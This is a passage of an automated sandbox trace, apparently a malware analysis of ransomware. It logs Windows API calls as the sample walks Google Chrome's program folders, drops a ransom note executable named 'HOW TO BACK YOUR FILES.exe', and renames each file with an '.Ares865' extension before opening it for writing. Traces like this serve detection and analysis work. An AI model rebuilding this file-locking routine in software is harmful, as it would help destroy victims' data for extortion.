(HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7928 [0140.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7c) returned 0x2f0518 [0140.653] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7930 | out: ListHead=0x2e7710, ListEntry=0x2e7930) returned 0x2e7910 [0140.653] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53368ba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53368ba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SetupMetrics", cAlternateFileName="SETUPM~1")) returned 0 [0140.654] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0140.654] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7930 [0140.654] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics" [0140.654] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics" [0140.654] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0140.654] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\setupmetrics\\how to back your files.exe"), bFailIfExists=1) returned 0 [0140.656] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0140.656] GetLastError () returned 0x0 [0140.656] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0140.656] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53368ba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53368ba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0140.657] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0140.657] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0140.657] lstrcpyW (in: lpString1=0x2cce47c, lpString2="20170605115313.pma" | out: lpString1="20170605115313.pma") returned="20170605115313.pma" [0140.657] lstrlenW (lpString="20170605115313.pma") returned 18 [0140.657] lstrlenW (lpString="Ares865") returned 7 [0140.657] lstrcmpiW (lpString1="313.pma", lpString2="Ares865") returned -1 [0140.657] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics\\20170605115313.pma.Ares865") returned 88 [0140.657] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics\\20170605115313.pma" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\setupmetrics\\20170605115313.pma"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics\\20170605115313.pma.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\setupmetrics\\20170605115313.pma.ares865"), dwFlags=0x1) returned 1 [0140.659] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics\\20170605115313.pma.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\setupmetrics\\20170605115313.pma.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.659] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6840) returned 1 [0140.664] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110" [0140.664] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110" [0140.664] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0140.664] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\how to back your files.exe"), bFailIfExists=1) returned 0 [0140.665] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0140.665] GetLastError () returned 0x0 [0140.666] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0140.666] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5338ed00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5338ed00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0140.666] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0140.666] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0140.666] lstrcpyW (in: lpString1=0x2cce47e, lpString2="58.0.3029.110.manifest" | out: lpString1="58.0.3029.110.manifest") returned="58.0.3029.110.manifest" [0140.666] lstrlenW (lpString="58.0.3029.110.manifest") returned 22 [0140.666] lstrlenW (lpString="Ares865") returned 7 [0140.666] lstrcmpiW (lpString1="anifest", lpString2="Ares865") returned -1 [0140.667] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest.Ares865") returned 93 [0140.667] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\58.0.3029.110.manifest"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\58.0.3029.110.manifest.ares865"), dwFlags=0x1) returned 1 [0140.668] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\58.0.3029.110.manifest.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.668] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=226) returned 1 [0140.671] lstrcpyW (in: lpString1=0x2cce47e, lpString2="chrome.dll" | out: lpString1="chrome.dll") returned="chrome.dll" [0140.671] lstrlenW (lpString="chrome.dll") returned 10 [0140.671] lstrlenW (lpString="Ares865") returned 7 [0140.671] lstrcmpiW (lpString1="ome.dll", lpString2="Ares865") returned 1 [0140.672] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.dll.Ares865") returned 81 [0140.672] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome.dll"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.dll.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome.dll.ares865"), dwFlags=0x1) returned 1 [0140.673] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.dll.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.673] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49289048) returned 1 [0140.827] lstrcpyW (in: lpString1=0x2cce47e, lpString2="chrome.dll.sig" | out: lpString1="chrome.dll.sig") returned="chrome.dll.sig" [0140.827] lstrlenW (lpString="chrome.dll.sig") returned 14 [0140.827] lstrlenW (lpString="Ares865") returned 7 [0140.827] lstrcmpiW (lpString1="dll.sig", lpString2="Ares865") returned 1 [0140.828] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.dll.sig.Ares865") returned 85 [0140.828] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.dll.sig" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome.dll.sig"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.dll.sig.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome.dll.sig.ares865"), dwFlags=0x1) returned 1 [0140.830] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.dll.sig.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome.dll.sig.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.831] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1407) returned 1 [0140.833] lstrcpyW (in: lpString1=0x2cce47e, lpString2="chrome.exe.sig" | out: lpString1="chrome.exe.sig") returned="chrome.exe.sig" [0140.834] lstrlenW (lpString="chrome.exe.sig") returned 14 [0140.834] lstrlenW (lpString="Ares865") returned 7 [0140.834] lstrcmpiW (lpString1="exe.sig", lpString2="Ares865") returned 1 [0140.834] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.exe.sig.Ares865") returned 85 [0140.834] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.exe.sig" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome.exe.sig"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.exe.sig.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome.exe.sig.ares865"), dwFlags=0x1) returned 1 [0140.836] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.exe.sig.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome.exe.sig.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.836] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1407) returned 1 [0140.839] lstrcpyW (in: lpString1=0x2cce47e, lpString2="chrome_100_percent.pak" | out: lpString1="chrome_100_percent.pak") returned="chrome_100_percent.pak" [0140.840] lstrlenW (lpString="chrome_100_percent.pak") returned 22 [0140.840] lstrlenW (lpString="Ares865") returned 7 [0140.840] lstrcmpiW (lpString1="ent.pak", lpString2="Ares865") returned 1 [0140.840] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_100_percent.pak.Ares865") returned 93 [0140.840] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_100_percent.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_100_percent.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_100_percent.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_100_percent.pak.ares865"), dwFlags=0x1) returned 1 [0140.842] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_100_percent.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_100_percent.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.842] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=455756) returned 1 [0140.867] lstrcpyW (in: lpString1=0x2cce47e, lpString2="chrome_200_percent.pak" | out: lpString1="chrome_200_percent.pak") returned="chrome_200_percent.pak" [0140.867] lstrlenW (lpString="chrome_200_percent.pak") returned 22 [0140.867] lstrlenW (lpString="Ares865") returned 7 [0140.867] lstrcmpiW (lpString1="ent.pak", lpString2="Ares865") returned 1 [0140.868] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_200_percent.pak.Ares865") returned 93 [0140.868] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_200_percent.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_200_percent.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_200_percent.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_200_percent.pak.ares865"), dwFlags=0x1) returned 1 [0140.870] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_200_percent.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_200_percent.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.870] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=723842) returned 1 [0140.914] lstrcpyW (in: lpString1=0x2cce47e, lpString2="chrome_child.dll" | out: lpString1="chrome_child.dll") returned="chrome_child.dll" [0140.914] lstrlenW (lpString="chrome_child.dll") returned 16 [0140.914] lstrlenW (lpString="Ares865") returned 7 [0140.914] lstrcmpiW (lpString1="ild.dll", lpString2="Ares865") returned 1 [0140.915] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_child.dll.Ares865") returned 87 [0140.915] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_child.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_child.dll"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_child.dll.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_child.dll.ares865"), dwFlags=0x1) returned 1 [0140.917] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_child.dll.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_child.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.917] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=60110168) returned 1 [0141.094] lstrcpyW (in: lpString1=0x2cce47e, lpString2="chrome_child.dll.sig" | out: lpString1="chrome_child.dll.sig") returned="chrome_child.dll.sig" [0141.094] lstrlenW (lpString="chrome_child.dll.sig") returned 20 [0141.094] lstrlenW (lpString="Ares865") returned 7 [0141.094] lstrcmpiW (lpString1="dll.sig", lpString2="Ares865") returned 1 [0141.094] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_child.dll.sig.Ares865") returned 91 [0141.094] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_child.dll.sig" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_child.dll.sig"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_child.dll.sig.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_child.dll.sig.ares865"), dwFlags=0x1) returned 1 [0141.098] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_child.dll.sig.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_child.dll.sig.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0141.098] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1407) returned 1 [0141.102] lstrcpyW (in: lpString1=0x2cce47e, lpString2="chrome_elf.dll" | out: lpString1="chrome_elf.dll") returned="chrome_elf.dll" [0141.102] lstrlenW (lpString="chrome_elf.dll") returned 14 [0141.102] lstrlenW (lpString="Ares865") returned 7 [0141.102] lstrcmpiW (lpString1="elf.dll", lpString2="Ares865") returned 1 [0141.102] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_elf.dll.Ares865") returned 85 [0141.102] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_elf.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_elf.dll"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_elf.dll.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_elf.dll.ares865"), dwFlags=0x1) returned 1 [0141.104] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_elf.dll.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_elf.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0141.104] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=550232) returned 1 [0141.132] lstrcpyW (in: lpString1=0x2cce47e, lpString2="chrome_watcher.dll" | out: lpString1="chrome_watcher.dll") returned="chrome_watcher.dll" [0141.132] lstrlenW (lpString="chrome_watcher.dll") returned 18 [0141.132] lstrlenW (lpString="Ares865") returned 7 [0141.132] lstrcmpiW (lpString1="her.dll", lpString2="Ares865") returned 1 [0141.133] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_watcher.dll.Ares865") returned 89 [0141.133] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_watcher.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_watcher.dll"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_watcher.dll.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_watcher.dll.ares865"), dwFlags=0x1) returned 1 [0141.135] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_watcher.dll.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_watcher.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0141.135] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=609112) returned 1 [0141.168] lstrcpyW (in: lpString1=0x2cce47e, lpString2="d3dcompiler_47.dll" | out: lpString1="d3dcompiler_47.dll") returned="d3dcompiler_47.dll" [0141.168] lstrlenW (lpString="d3dcompiler_47.dll") returned 18 [0141.168] lstrlenW (lpString="Ares865") returned 7 [0141.168] lstrcmpiW (lpString1="_47.dll", lpString2="Ares865") returned -1 [0141.169] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\d3dcompiler_47.dll.Ares865") returned 89 [0141.169] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\d3dcompiler_47.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\d3dcompiler_47.dll"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\d3dcompiler_47.dll.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\d3dcompiler_47.dll.ares865"), dwFlags=0x1) returned 1 [0141.171] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\d3dcompiler_47.dll.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\d3dcompiler_47.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0141.171] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4488896) returned 1 [0141.295] lstrcpyW (in: lpString1=0x2cce47e, lpString2="default_apps" | out: lpString1="default_apps") returned="default_apps" [0141.295] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7908 [0141.295] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x98) returned 0x31afc8 [0141.295] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7910 | out: ListHead=0x2e7710, ListEntry=0x2e7910) returned 0x2e78f0 [0141.295] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7deaf880, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7deaf880, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7689b536, ftLastWriteTime.dwHighDateTime=0x1d2c8a4, nFileSizeHigh=0x0, nFileSizeLow=0x3358, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eventlog_provider.dll", cAlternateFileName="EVENTL~1.DLL")) returned 1 [0141.295] lstrcmpiW (lpString1="eventlog_provider.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0141.295] lstrcmpiW (lpString1="eventlog_provider.dll", lpString2="aoldtz.exe") returned 1 [0141.295] lstrcpyW (in: lpString1=0x2cce47e, lpString2="eventlog_provider.dll" | out: lpString1="eventlog_provider.dll") returned="eventlog_provider.dll" [0141.295] lstrlenW (lpString="eventlog_provider.dll") returned 21 [0141.295] lstrlenW (lpString="Ares865") returned 7 [0141.295] lstrcmpiW (lpString1="der.dll", lpString2="Ares865") returned 1 [0141.296] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\eventlog_provider.dll.Ares865") returned 92 [0141.296] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\eventlog_provider.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\eventlog_provider.dll"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\eventlog_provider.dll.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\eventlog_provider.dll.ares865"), dwFlags=0x1) returned 1 [0141.299] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\eventlog_provider.dll.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\eventlog_provider.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0141.299] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13144) returned 1 [0141.303] lstrcpyW (in: lpString1=0x2cce47e, lpString2="Extensions" | out: lpString1="Extensions") returned="Extensions" [0141.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7928 [0141.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x94) returned 0x31b068 [0141.303] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7930 | out: ListHead=0x2e7710, ListEntry=0x2e7930) returned 0x2e7910 [0141.303] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5338ed00, 